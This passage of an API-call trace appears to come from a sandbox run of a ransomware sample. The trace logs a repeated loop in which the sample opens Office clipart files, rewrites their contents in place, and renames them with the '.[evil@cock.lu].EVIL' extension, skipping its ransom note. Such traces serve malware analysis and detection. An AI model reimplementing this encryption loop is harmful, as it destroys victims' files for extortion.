_Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0139.055] __uncaught_exception () returned 0x84b1160800 [0139.055] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0139.055] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105520.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105520.wmf.[evil@cock.lu].evil")) returned 1 [0139.055] ??_V@YAXPEAX@Z () returned 0x1 [0139.058] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF", dwFileAttributes=0x200) returned 0 [0139.059] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0139.059] wcsstr (_Str="J0105526.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0139.059] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF") returned 69 [0139.059] wcscmp (_String1="J0105526.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0139.059] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105526.WMF") returned 0x0 [0139.059] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF") returned 0x45 [0139.059] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105526.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0139.061] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x43b4, lpOverlapped=0x0) returned 1 [0139.112] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.112] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.112] _errno () returned 0x84b1160840 [0139.112] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.112] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x43c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x43c0, lpOverlapped=0x0) returned 1 [0139.112] CloseHandle (hObject=0x1a8) returned 1 [0139.112] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0139.112] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0139.113] __uncaught_exception () returned 0x84b1160800 [0139.113] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0139.113] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105526.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105526.wmf.[evil@cock.lu].evil")) returned 1 [0139.113] ??_V@YAXPEAX@Z () returned 0x1 [0139.116] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF", dwFileAttributes=0x200) returned 0 [0139.116] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0139.116] wcsstr (_Str="J0105530.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0139.116] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF") returned 69 [0139.116] wcscmp (_String1="J0105530.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0139.116] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105530.WMF") returned 0x0 [0139.116] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF") returned 0x45 [0139.116] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105530.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0139.118] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1cd8, lpOverlapped=0x0) returned 1 [0139.162] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.162] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.162] _errno () returned 0x84b1160840 [0139.162] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.162] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1ce0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ce0, lpOverlapped=0x0) returned 1 [0139.162] CloseHandle (hObject=0x1a8) returned 1 [0139.162] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0139.163] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0139.163] __uncaught_exception () returned 0x84b1160800 [0139.163] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0139.163] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105530.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105530.wmf.[evil@cock.lu].evil")) returned 1 [0139.164] ??_V@YAXPEAX@Z () returned 0x1 [0139.166] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF", dwFileAttributes=0x200) returned 0 [0139.166] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0139.166] wcsstr (_Str="J0105588.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0139.166] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF") returned 69 [0139.166] wcscmp (_String1="J0105588.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0139.166] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105588.WMF") returned 0x0 [0139.166] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF") returned 0x45 [0139.167] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105588.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0139.169] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x542c, lpOverlapped=0x0) returned 1 [0139.188] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.188] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.188] _errno () returned 0x84b1160840 [0139.188] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.189] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x5440, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5440, lpOverlapped=0x0) returned 1 [0139.189] CloseHandle (hObject=0x1a8) returned 1 [0139.189] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0139.189] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0139.189] __uncaught_exception () returned 0x84b1160800 [0139.189] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0139.189] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105588.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105588.wmf.[evil@cock.lu].evil")) returned 1 [0139.190] ??_V@YAXPEAX@Z () returned 0x1 [0139.193] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF", dwFileAttributes=0x200) returned 0 [0139.193] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0139.193] wcsstr (_Str="J0105600.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0139.193] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF") returned 69 [0139.193] wcscmp (_String1="J0105600.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0139.193] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105600.WMF") returned 0x0 [0139.193] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF") returned 0x45 [0139.193] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105600.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0139.195] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x21e8, lpOverlapped=0x0) returned 1 [0139.215] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.215] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.215] _errno () returned 0x84b1160840 [0139.215] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.215] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x2200, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2200, lpOverlapped=0x0) returned 1 [0139.215] CloseHandle (hObject=0x1a8) returned 1 [0139.215] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0139.215] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0139.216] __uncaught_exception () returned 0x84b1160800 [0139.216] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0139.216] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105600.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105600.wmf.[evil@cock.lu].evil")) returned 1 [0139.217] ??_V@YAXPEAX@Z () returned 0x1 [0139.219] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF", dwFileAttributes=0x200) returned 0 [0139.219] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0139.219] wcsstr (_Str="J0105638.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0139.219] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF") returned 69 [0139.219] wcscmp (_String1="J0105638.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0139.219] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105638.WMF") returned 0x0 [0139.219] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF") returned 0x45 [0139.219] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105638.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0139.221] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x287c, lpOverlapped=0x0) returned 1 [0139.229] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.229] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.229] _errno () returned 0x84b1160840 [0139.229] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.229] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x2880, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2880, lpOverlapped=0x0) returned 1 [0139.229] CloseHandle (hObject=0x1a8) returned 1 [0139.229] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0139.230] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0139.230] __uncaught_exception () returned 0x84b1160800 [0139.230] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0139.230] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105638.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105638.wmf.[evil@cock.lu].evil")) returned 1 [0139.231] ??_V@YAXPEAX@Z () returned 0x1 [0139.234] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF", dwFileAttributes=0x200) returned 0 [0139.234] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0139.234] wcsstr (_Str="J0105710.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0139.234] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF") returned 69 [0139.234] wcscmp (_String1="J0105710.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0139.234] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105710.WMF") returned 0x0 [0139.234] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF") returned 0x45 [0139.234] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105710.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0139.236] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x35f0, lpOverlapped=0x0) returned 1 [0139.255] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.255] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.255] _errno () returned 0x84b1160840 [0139.255] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.255] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x3600, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3600, lpOverlapped=0x0) returned 1 [0139.255] CloseHandle (hObject=0x1a8) returned 1 [0139.255] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0139.255] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0139.255] __uncaught_exception () returned 0x84b1160800 [0139.255] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0139.256] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105710.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105710.wmf.[evil@cock.lu].evil")) returned 1 [0139.256] ??_V@YAXPEAX@Z () returned 0x1 [0139.259] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF", dwFileAttributes=0x200) returned 0 [0139.259] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0139.259] wcsstr (_Str="J0105846.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0139.259] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF") returned 69 [0139.259] wcscmp (_String1="J0105846.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0139.259] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105846.WMF") returned 0x0 [0139.259] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF") returned 0x45 [0139.259] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105846.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0139.261] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2030, lpOverlapped=0x0) returned 1 [0139.268] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.268] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.268] _errno () returned 0x84b1160840 [0139.268] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.269] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2040, lpOverlapped=0x0) returned 1 [0139.269] CloseHandle (hObject=0x1a8) returned 1 [0139.269] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0139.269] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0139.269] __uncaught_exception () returned 0x84b1160800 [0139.269] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0139.269] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105846.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105846.wmf.[evil@cock.lu].evil")) returned 1 [0139.270] ??_V@YAXPEAX@Z () returned 0x1 [0139.273] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF", dwFileAttributes=0x200) returned 0 [0139.273] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0139.273] wcsstr (_Str="J0105912.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0139.273] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF") returned 69 [0139.273] wcscmp (_String1="J0105912.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0139.273] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105912.WMF") returned 0x0 [0139.273] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF") returned 0x45 [0139.273] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105912.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0139.275] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2dc8, lpOverlapped=0x0) returned 1 [0139.282] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.282] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.282] _errno () returned 0x84b1160840 [0139.282] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.282] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x2de0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2de0, lpOverlapped=0x0) returned 1 [0139.283] CloseHandle (hObject=0x1a8) returned 1 [0139.283] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0139.283] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0139.283] __uncaught_exception () returned 0x84b1160800 [0139.283] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0139.283] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105912.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft 